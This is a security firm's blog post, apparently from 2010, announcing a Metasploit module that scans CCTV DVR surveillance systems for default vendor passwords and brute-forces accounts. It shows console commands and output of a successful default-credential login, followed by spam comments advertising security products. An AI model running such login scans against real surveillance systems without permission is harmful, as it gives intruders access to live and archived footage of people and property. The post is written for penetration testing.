Friday, September 17, 2010

Hacking CCTV Security Video Surveillance Systems with Metasploit

A new module for the Metasploit Framework, CCTV DVR Login Scanning Utility*, discovers and tests the security of standalone CCTV (Closed Circuit Television) video surveillance systems. Such systems are frequently deployed in retail stores, living communities, personal residences, and business environments as part of their physical security program. However, many of these systems are vulnerable to exploitation that can allow attackers remote access. Such remote access, enabled by default, can allow not only the ability to view real-time video, but control of the cameras (if supported), and provide access to archived footage.

Most owners of CCTV video surveillance systems may not even be fully aware of the device's remote access capabilities as monitoring may be conducted exclusively via the local video console. This further increases the likelihood of attackers gaining/persisting remote access, with no indication to the owner that their video surveillance system and archived footage may be accessed remotely.

Here at Gotham Digital Science, we often encounter video surveillance systems during penetration testing engagements – some of which may be exposed to the Internet, either intentionally or by accident. With any video surveillance system it is often interesting (and sometimes very important) to find out exactly what cameras are monitoring/recording within the environment. Furthermore, access to such systems can often be utilized to support physical security testing initiatives.

This module targets standalone CCTV video surveillance systems by MicroDigital, HIKVISION, CTRing, and a substantial number of other rebranded devices.

msf > use auxiliary/scanner/misc/cctv_dvr_loginmsf auxiliary(cctv_dvr_login) > set RHOSTS 10.10.1.14RHOSTS => 10.10.1.14msf auxiliary(cctv_dvr_login) > exploit

[*] 10.10.1.14:5920 CCTV_DVR - [001/133] - Trying username:'admin' with password:''
[-] 10.10.1.14:5920 CCTV_DVR - [001/133] - Failed login as: 'admin'
[*] 10.10.1.14:5920 CCTV_DVR - [002/133] - Trying username:'user' with password:''
[-] 10.10.1.14:5920 CCTV_DVR - [002/133] - Invalid user: 'user'
[*] 10.10.1.14:5920 CCTV_DVR - [003/133] - Trying username:'admin' with password:'admin'
[-] 10.10.1.14:5920 CCTV_DVR - [003/133] - Failed login as: 'admin'
[*] 10.10.1.14:5920 CCTV_DVR - [004/133] - Trying username:'admin' with       password:'1111'
[+] 10.10.1.14:5920 Successful login: 'admin' : '1111'
[*] Confirmed IE ActiveX HTTP interface (CtrWeb.cab v1,1,3,1): http://10.10.1.14:80
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
*CCTV DVR Login Scanning Utility:
This module tests for standalone CCTV DVR video surveillance deployments specifically by MicroDigital, HIKVISION, CTRing, and numerous other rebranded devices that are utilizing default vendor passwords. Additionally, this module has the ability to brute force user accounts. Such CCTV DVR video surveillance deployments support remote viewing through Central Management Software (CMS) via the CMS Web Client, an IE ActiveX control hosted over HTTP, or through Win32 or mobile CMS client software. By default, remote authentication is handled over port 5920/TCP with video streaming over 5921/TCP. After successful authentication over 5920/TCP this module will then attempt to determine if the IE ActiveX control is listening on the default HTTP port (80/TCP).
Module Name : auxiliary/scanner/misc/cctv_dvr_login
Authors: Mr. Justin Cacak

17 comments:

SEONB said...

WE are China based Playing Cards Manufacturer and We had lunch our new product Playing Cards this is proper designed and used best quality products for everyone uses. So you can visit our website and can get any kind of Playing cards and Educations cards.

SEONB said...

JUKI Pick and Place Machine, JUKI Chip Mounter, JUKI Chip Shooter, JUKI Shooter, JUKI SMT Placement, JUKI Chip Placement, High Speed Chip Shooter, SMT Chip Shooter, JUKI RS-1, JUKI JM-20, JUKI KE-2060, JUKI JX-350, JUKI KE-2050, JUKI JX-100, JUKI KE-2070, JUKI JX-200, JUKI KE-2080, JUKI KE-3010A, JUKI KE-3020VA, JUKI FX-3R, JUKI FX-3RA, JUKI RX-6R, JUKI RX-6B, JUKI JX-300LED.

Abhi said...

Thanks for info
surveillance cameras system

sman said...

Thanks for sharing CCTV bus solutions in dubai

lost_in_woods said...

Thanks for sharing this kind of useful information door controller systems dubai
access control dubai

Unknown said...

SITE SURVEILLANCE

Truck mounted mobile systems are also used to assist border agents as they ... The Mobile Camera Tower offers a new, innovative, ready-to-use system that can ...

http://www.mobilecameratower.com/

Unknown said...

SITE SURVEILLANCE

Truck mounted mobile systems are also used to assist border agents as they ... The Mobile Camera Tower offers a new, innovative, ready-to-use system that can ...

http://www.mobilecameratower.com/

striker said...

Thanks for the information CCTV security systems

Meerconsultants said...

Great job here on _______ I read a lot of blog posts, but I never heard a topic like this. I Love this topic you made about the CCTV camera installation in Islamabad,
Security Camera System Instillation in Islamabad,

All Around Security lnc said...

Great Blog!
It is very informative and helpful for me. I admire the valuable information you have given in this blog. Thanks for sharing it.
If you require information related to data cabling kindly visit us:
voice and data cabling installer NYC
intercom system installation NYC
access control system companies NYC

Unik CCTV said...

There's nothing like a Residential Video Intercom Systems to add convenience and safety at your front door or gate. And these days you don't even need to be home to see who is at your door.

Ellisa said...

GDPR training is important so that they do not make one silly mistake that snowballs into a hefty fine not only this but you also must have a cookie consent banner on your website.

emailtaai said...

These Lock Systems Replacement Parts the traditional keys with better and more secure automation features like remote locking and unlocking. In these locks, a latch or bolt is made to cross the opening between the side of the door and the doorframe, thereby preventing access. Digital Door Locks, also known as keyless doors, the locks replace the keys with a digital screen, where you can put numeric digits as a code. On pressing the specific password, the locks get active and unlock. Unik cctv legacy continues to ensure a high degree of security to consumers with the implementation of latest technology and constant innovation.

Britannia2kHoldings said...

This blog is relay helpful and it's very informative.

Foldable solar panels
Video surveillance systems
Ground system

Unknown said...

we are CCTV Camera Dealers in Gurgaon. for more information plz visit us.
CCTV Camera Dealers in Gurgaon
hikvision cctv camera
matrix cctv camera in gurgaon

Unknown said...


Thanks for your wonderful blog very informative.
If anybody needs best security cameras then plz visit us.

AnnuAnusha said...

Firetech fire monitors are robust products designed with advanced technology and have been tested to provide the high-quality water jet and fog patterns.
engineering system solutions